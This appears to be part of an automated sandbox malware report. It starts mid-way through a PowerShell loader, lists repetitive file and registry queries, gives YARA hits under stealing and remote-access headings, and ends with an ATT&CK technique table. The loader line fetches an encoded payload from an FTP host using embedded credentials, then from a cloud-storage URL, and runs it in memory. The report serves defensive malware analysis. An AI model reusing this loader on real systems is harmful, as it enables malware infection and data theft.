[system.text.encoding]::utf8;$hxtz.credentials = new-object system.net.networkcredential((-join [char[]](100,101,115,99,107,118,98,114,97,116,49)),'developerpro21578jp@@');$lbczsg = $hxtz.downloadstring( 'ftp://desckvbrat1@ftp.desckvbrat.com.br/upcrypter/01/dll01.txt' );$hxtz.dispose();$hxtz = (new-object net.webclient);$hxtz.encoding = [system.text.encoding]::utf8;$lbczsg = $hxtz.downloadstring( $lbczsg );$huupx = 'c:\users\user\desktop\oficio notificacion multas y sanciones.vbs';[byte[]] $acbcz = [system.convert]::frombase64string( $lbczsg.replace( '?:?' , 'a' ) );[system.appdomain]::currentdomain.load( $acbcz ).gettype('classlibrary3.class1').getmethod( 'prfvi' ).invoke( $null , [object[]] ( '2b491e528cd1-6cfb-b104-be87-06a096ec=nekot&aidem=tla?txt.soveun-soivne/o/moc.topsppa.6d4cd-sagracsed/b/0v/moc.sipaelgoog.egarotsesaberif//:sptth' , $huupx , 'true' ) );};"Jump to behavior
                        Source: RegAsm.exe, 0000000F.00000002.3000375928.0000000002891000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.3000375928.0000000002D1D000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.3000375928.0000000002D0F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager@\]q
                        Source: RegAsm.exe, 0000000F.00000002.3000375928.0000000002891000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.3047042436.0000000005D51000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.3000375928.0000000002D1D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe VolumeInformation
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe VolumeInformation
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe VolumeInformation
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                        Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                        Stealing of Sensitive Information

                        barindex
                        Source: Yara matchFile source: 23.2.powershell.exe.20958f44b38.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 23.2.powershell.exe.20958f44b38.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 20.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.powershell.exe.20a2a7dbe00.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 18.2.powershell.exe.2078fd84ec0.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 23.2.powershell.exe.20958f407d8.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.powershell.exe.20a2a7d7a88.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 18.2.powershell.exe.2078fd80b60.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.powershell.exe.20a2a7dbe00.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 18.2.powershell.exe.2078fd84ec0.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000017.00000002.2442574542.0000020959177000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000F.00000002.3000375928.0000000002891000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000C.00000002.2263158349.0000020A2AA0C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000012.00000002.2358188672.000002078FFB6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000012.00000002.2358188672.000002078FC86000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000017.00000002.2442574542.0000020958E27000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000014.00000002.2386362117.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000C.00000002.2263158349.0000020A2A709000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 1088, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 5792, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 7212, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7428, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 7544, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7656, type: MEMORYSTR

                        Remote Access Functionality

                        barindex
                        Source: Yara matchFile source: 23.2.powershell.exe.20958f44b38.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 23.2.powershell.exe.20958f44b38.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 20.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.powershell.exe.20a2a7dbe00.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 18.2.powershell.exe.2078fd84ec0.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 23.2.powershell.exe.20958f407d8.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.powershell.exe.20a2a7d7a88.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 18.2.powershell.exe.2078fd80b60.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.powershell.exe.20a2a7dbe00.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 18.2.powershell.exe.2078fd84ec0.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000017.00000002.2442574542.0000020959177000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000F.00000002.3000375928.0000000002891000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000C.00000002.2263158349.0000020A2AA0C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000012.00000002.2358188672.000002078FFB6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000012.00000002.2358188672.000002078FC86000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000017.00000002.2442574542.0000020958E27000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000014.00000002.2386362117.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000C.00000002.2263158349.0000020A2A709000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 1088, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 5792, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 7212, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7428, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 7544, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7656, type: MEMORYSTR
                        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                        Gather Victim Identity Information321
                        Scripting
                        Valid Accounts1
                        Native API
                        321
                        Scripting
                        1
                        DLL Side-Loading
                        11
                        Disable or Modify Tools
                        11
                        Input Capture
                        2
                        File and Directory Discovery
                        Remote Services1
                        Archive Collected Data
                        1
                        Web Service
                        1
                        Exfiltration Over Alternative Protocol
                        Abuse Accessibility Features
                        CredentialsDomainsDefault Accounts1
                        Exploitation for Client Execution
                        1
                        DLL Side-Loading
                        212
                        Process Injection
                        2
                        Obfuscated Files or Information
                        LSASS Memory12
                        System Information Discovery
                        Remote Desktop Protocol11
                        Input Capture
                        1
                        Ingress Tool Transfer
                        Exfiltration Over BluetoothNetwork Denial of Service
                        Email AddressesDNS ServerDomain Accounts11
                        Command and Scripting Interpreter
                        11
                        Registry Run Keys / Startup Folder
                        11
                        Registry Run Keys / Startup Folder
                        2
                        Software Packing
                        Security Account Manager11
                        Security Software Discovery
                        SMB/Windows Admin SharesData from Network Shared Drive11
                        Encrypted Channel
                        Automated ExfiltrationData Encrypted for Impact
